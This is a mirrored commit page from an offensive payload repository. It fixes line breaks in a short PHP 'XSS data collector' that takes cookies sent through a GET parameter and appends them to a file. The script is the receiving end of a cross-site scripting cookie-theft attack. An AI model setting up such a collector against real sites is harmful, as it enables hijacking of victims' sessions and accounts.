mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00
Merge pull request #242 from maxrodrigo/master
Fix PHP XSS data collector line breaks
This commit is contained in:
commit
b5e511c03b
@ -82,7 +82,7 @@ Write the collected data into a file.
|
||||
<?php
|
||||
$cookie = $_GET['c'];
|
||||
$fp = fopen('cookies.txt', 'a+');
|
||||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
||||
fwrite($fp, 'Cookie:' .$cookie."\r\n");
|
||||
fclose($fp);
|
||||
?>
|
||||
```
|
||||
|
Loading…
Reference in New Issue
Block a user